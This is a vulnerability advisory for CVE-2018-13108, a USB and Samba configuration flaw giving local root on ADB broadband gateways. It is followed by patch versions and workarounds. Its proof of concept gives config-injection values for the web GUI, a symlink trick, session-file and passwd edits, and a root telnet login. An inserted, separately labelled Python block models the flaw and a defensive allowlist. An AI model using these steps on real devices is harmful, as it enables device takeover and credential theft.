ADB Local Root Jailbreak

Published: 04 Jul 2018 00:00:00. Reported by Johannes Greil. Type: packetstorm (source: packetstormsecurity.com). 80 views.

Local root jailbreak vulnerability on ADB broadband gateways with impact on network security

Related records:

| Family | Title | Published |
|---|---|---|
| 0day.today (zdt) | ADB Broadband Gateways / Routers - Local Root Jailbreak Vulnerability | 5 Jul 2018 00:00 |
| CNVD | ADB Broadband Gateways/Routers Local Root Jailbreak Vulnerability | 5 Jul 2018 00:00 |
| CVE | CVE-2018-13108 | 6 Jul 2018 14:00 |
| Cvelist | CVE-2018-13108 | 6 Jul 2018 14:00 |
| Exploit DB | ADB Broadband Gateways / Routers - Local Root Jailbreak | 5 Jul 2018 00:00 |
| EUVD | EUVD-2018-5057 | 7 Oct 2025 00:30 |
| exploitpack | ADB Broadband Gateways Routers - Local Root Jailbreak | 5 Jul 2018 00:00 |
| NVD | CVE-2018-13108 | 6 Jul 2018 14:29 |
| Prion | Design/Logic Flaw | 6 Jul 2018 14:29 |
| ThreatPost | Year-Old Critical Vulnerabilities Patched in ISP Broadband Gear | 5 Jul 2018 18:05 |
SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >  
=======================================================================  
title: Local root jailbreak via network file sharing flaw  
product: All ADB Broadband Gateways / Routers  
(based on Epicentro platform)  
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.  
fixed version: see "Solution" section below  
CVE number: CVE-2018-13108  
impact: critical  
homepage: http://www.adbglobal.com  
found: 2016-06-09  
by: Johannes Greil (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"ADB creates and delivers the right solutions that enable our customers to  
reduce integration and service delivery challenges to increase ARPU and reduce  
churn. We combine ADB know-how and products with those from a number of third  
party industry leaders to deliver complete solutions that benefit from  
collaborative thinking and best in class technologies."  
  
Source: https://www.adbglobal.com/about-adb/  
  
"Founded in 1995, ADB initially focused on developing and marketing software  
for digital TV processors and expanded its business to the design and  
manufacture of digital TV equipment in 1997. The company sold its first set-top  
box in 1997 and since then has been delivering a number of set-top boxes, and  
Gateway devices, together with advanced software platforms. ADB has sold over  
60 million devices worldwide to cable, satellite, IPTV and broadband operators.  
ADB employs over 500 people, of which 70% are in engineering functions."  
  
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast  
  
  
Business recommendation:  
------------------------  
By exploiting the local root vulnerability on affected and unpatched devices  
an attacker is able to gain full access to the device with highest privileges.  
Attackers are able to modify any settings that might have otherwise been  
prohibited by the ISP. It is possible to retrieve all stored user credentials  
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network  
side of the ISP are possible by using the device as a jump host, depending on  
the internal network security measures.  
  
Network security should not depend on the security of independent devices,  
such as modems. An attacker with root access to such a device can enable  
attacks on connected networks, such as administrative networks managed by the  
ISP or other users.  
  
It is highly recommended by SEC Consult to perform a thorough security review  
by security professionals for this platform. It is assumed that further critical  
vulnerabilities exist within the firmware of this device.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)  
Most ADB devices offer USB ports in order for customers to use them for  
printer or file sharing. In the past, ADB devices have suffered from symlink  
attacks e.g. via FTP server functionality which has been fixed in more recent  
firmware versions.  
  
The "Network File Sharing" feature of current ADB devices via USB uses a samba  
daemon which accesses the USB drive with highest access rights and exports the  
network shares with root user permissions. The default and hardcoded setting  
for the samba daemon within the smb.conf on the device has set "wide links =  
no" which normally disallows gaining access to the root file system of the  
device using symlink attacks via a USB drive.  
  
But an attacker is able to exploit both a web GUI input validation and samba  
configuration file parsing problem which makes it possible to access the root  
file system of the device with root access rights via a manipulated USB drive.  
  
The attacker can then edit various system files, e.g. passwd and session  
information of the web server in order to escalate web GUI privileges and  
start a telnet server and gain full system level shell access as root.  
  
  
This is a local attack and not possible via remote access vectors, as an  
attacker needs to insert a specially crafted USB drive into the device!  
Usually not even the ISPs themselves have direct root access on ADB devices,  
so this attack is quite problematic as a starting point for further internal attacks.  
  
It is possible to change network routes and attack networks and systems within  
the internal network of the ISP or add backdoors or sniffers to the device.  
  
  
Furthermore, attackers are able to gain access to all stored credentials,  
such as PPP, wireless, CPE management or VoIP passwords.  
  
  
Proof of concept:  
-----------------  
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)  
The samba configuration file (smb.conf) of the ADB devices has set the  
following default settings. All file system operations will be performed  
by the root user as set in the "force user" / "force group" setting of the  
exported share:  
  
[global]  
netbios name = HOSTNAME  
workgroup = WORKGROUP  
wide links = no  
smb ports = 445 139  
security = share  
guest account = root  
announce version = 5.0  
socket options = TCP_NODELAY SO_RCVBUF=65536 SO_SNDBUF=65536  
null passwords = yes  
name resolve order = hosts wins bcast  
wins support = yes  
syslog only = yes  
read only = no  
hosts allow = 192.168.1.1/255.255.255.0  
[share]  
path = /mnt/sdb1/.  
read only = false  
force user = root  
force group = root  
guest ok = yes  
  
  
  
An attacker can edit various values such as "netbios name" and "workgroup" via  
the web GUI. The web GUI does some basic filtering, and newlines are not  
allowed (the samba config file is line-based), hence a special bypass has been  
crafted in order to change the default setting "wide links = no" to "wide  
links = yes". This enables symlinks to the root file system.  
  
By using the following netbios name and workgroup, samba can be tricked into  
allowing symlinks to the root file system of the device:  
netbios domain / workgroup = =wide links = yes \ \  
netbios name = wide links = yes \  
  
Relevant HTTP POST parameters:  
&domainName==wide links = yes \ \ &hostName=wide+links+%3D+yes+%5C  
  
  
According to the manpage of smb.conf, any line ending in a \ is continued by the  
samba parser on the next line. Furthermore, it states that "Only the first  
equals sign in a parameter is significant.", which, it seems, can be bypassed  
by adding a backslash \. The parser now thinks that "wide links = yes" has  
been set and ignores the hardcoded "wide links = no" which comes further down  
in the smb.conf file.  
  
  
In order to add those special values within the web GUI a proxy server such as  
burp proxy is needed because of basic input validation on the client side (not  
server side).  
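Added example (not code from the SEC Consult advisory or from the ADB firmware): a Python model of the config-rendering step described above. It writes the two GUI-controlled values into a template mirroring the quoted [global] lines, applies only the manpage continuation rule (a trailing backslash joins the next line) to show that the hard-coded "wide links = no" no longer survives as its own logical line, and contrasts the verbatim rendering with a server-side allowlist; the allowlist pattern, template and function names are assumptions, not Samba's full parser or ADB's code.

```python
import re

# Template mirroring the [global] lines quoted in the advisory (constructed here,
# trimmed to the two GUI-controlled values and the hard-coded setting they target).
TEMPLATE = "[global]\nnetbios name = {name}\nworkgroup = {workgroup}\nwide links = no\n"

# The GUI-controlled strings from the advisory's POST parameters (hostName / domainName).
PAYLOAD_NAME = "wide links = yes \\"
PAYLOAD_WORKGROUP = "=wide links = yes \\ \\"

def render_unsafe(name, workgroup):
    """Vulnerable pattern: GUI strings written verbatim into a line-based config."""
    return TEMPLATE.format(name=name, workgroup=workgroup)

# Server-side allowlist (assumed policy, stricter than the NetBIOS spec):
# 1-15 alphanumerics or hyphens, so no '=', '\', whitespace or newline reaches smb.conf.
SAFE_RE = re.compile(r"[A-Za-z0-9-]{1,15}")

def validate(value):
    return SAFE_RE.fullmatch(value) is not None

def render_safe(name, workgroup):
    """Hardened form: reject anything outside the allowlist before rendering."""
    for value in (name, workgroup):
        if not validate(value):
            raise ValueError(f"rejected smb.conf value: {value!r}")
    return TEMPLATE.format(name=name, workgroup=workgroup)

def logical_lines(config_text):
    """Model only the manpage rule the advisory relies on: a physical line ending in a
    backslash is joined with the next one. Returns the logical lines a parser would see."""
    lines, buf = [], ""
    for raw in config_text.splitlines():
        if raw.endswith("\\"):
            buf += raw[:-1]
            continue
        lines.append(buf + raw)
        buf = ""
    if buf:
        lines.append(buf)
    return lines

def hardcoded_setting_intact(config_text, setting="wide links = no"):
    """Audit check for a rendered config: is the hard-coded setting still its own line?"""
    return setting in logical_lines(config_text)

if __name__ == "__main__":
    print(hardcoded_setting_intact(render_unsafe(PAYLOAD_NAME, PAYLOAD_WORKGROUP)))  # False
    print(hardcoded_setting_intact(render_safe("HOSTNAME", "WORKGROUP")))           # True
```

The same `logical_lines` check can be run over an smb.conf pulled from a device to flag any continuation line that swallows a hard-coded setting.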
  
  
The USB drive needs to be formatted to ext2 or ext3 which is supported by  
the ADB device. Then create a symlink to the root file system via the  
following command on the attacker's computer:  
ln -s / /path/to/usbdevice/rootfs  
  
After those settings have been changed and the USB drive has been set up,  
the USB drive can be inserted into the ADB device. The USB volume needs to be  
exported (with read/write permissions) as a share via the web GUI. Afterwards  
it can be accessed over the network and the "rootfs" folder example from above  
will give an attacker access to the ADB root file system with "read & write"  
access permissions as root.  
  
Most file systems / partitions on the device are mounted read-only per default,  
but the most important one "/tmp" contains all settings and is mounted writable  
for operations.  
  
  
The default user "admin" usually has few access rights during normal  
operation, which can be changed by manipulating the session file of the web  
server within /tmp/ui_session_XXX, where XXX is the session id of the currently  
logged on user, e.g. change:  
from: access.dboard/settings/management/telnetserver =|> 2001  
to: access.dboard/settings/management/telnetserver =|> 2220  
etc. (or change all entries for maximum access level)  
  
  
This way, an attacker can give himself all/highest access permissions within  
the GUI and change all the settings of the device! Hence the telnet or SSH  
server can be started even though they might have been disabled by the ISP.  
Furthermore, the /tmp/passwd file has to be changed in order to allow root  
access via shell/telnet:  
change: root:*:0:0:root:/root:/bin/ash  
to: root::0:0:root:/root:/bin/ash  
  
Now telnet into the device with root and no password.  
Example of an ADB DV2210 device:  
  
Trying $IP...  
Connected to $IP.  
Escape character is '^]'.  
Login root:  
  
  
BusyBox v1.17.3 (2016-02-11 13:34:33 CET) built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
  
..................................................................  
yet another purposeful solution by A D B Broadband  
..................................................................  
root@$hostname:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@$hostname:~#  
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following devices & firmware have been tested which were the most recent  
versions at the time of discovery.  
  
The firmware versions depend on the ISP / customer of ADB and may vary!  
  
ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP  
ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP  
ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP  
ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP  
etc.  
  
It has been confirmed by ADB that _all_ their ADB modems / gateways / routers  
based on the Epicentro platform with USB ports and network file sharing  
features are affected by this vulnerability in all firmware versions for all  
their customers (ISPs) at the time of identification of the vulnerability.  
  
  
Vendor contact timeline:  
------------------------  
2016-06-15: Contacting vendor ADB, exchanging encryption keys & advisory  
Asking about affected devices / firmware, timeline for hotfix  
Fast initial response from ADB providing requested information  
2016-06-16: Asking about other affected devices  
2016-06-17: Resending previous question due to encryption problems  
2016-07-04: Conference call  
2016-07 - 2017-04: Further coordination, waiting for firmware release,  
implementation & rollout phases for their customers  
2018-07-04: Embargo lifted, public release of security advisory  
  
  
Solution:  
---------  
The firmware versions depend on the ISP / customer of ADB and may vary!  
  
Patch version:  
  
ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP  
ADB DV2210 >= E_5.3.2, firmware version depending on ISP  
ADB VV5522 >= E_8.3.2, firmware version depending on ISP  
ADB VV2220 >= E_9.3.2, firmware version depending on ISP  
  
Centro Business 1 >= 7.12.10  
Centro Business 2 >= 8.06.08  
  
etc.  
  
  
Workaround:  
-----------  
Restrict access to the web interface and only allow trusted users.  
Change any default/weak passwords to strong credentials.  
Don't allow remote access to the web GUI via Internet.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF J. Greil / @2018  
  


Current as of 04 Jul 2018 00:00. Vulners AI Score: 7.7 (High risk). EPSS: 0.00442. Views: 80.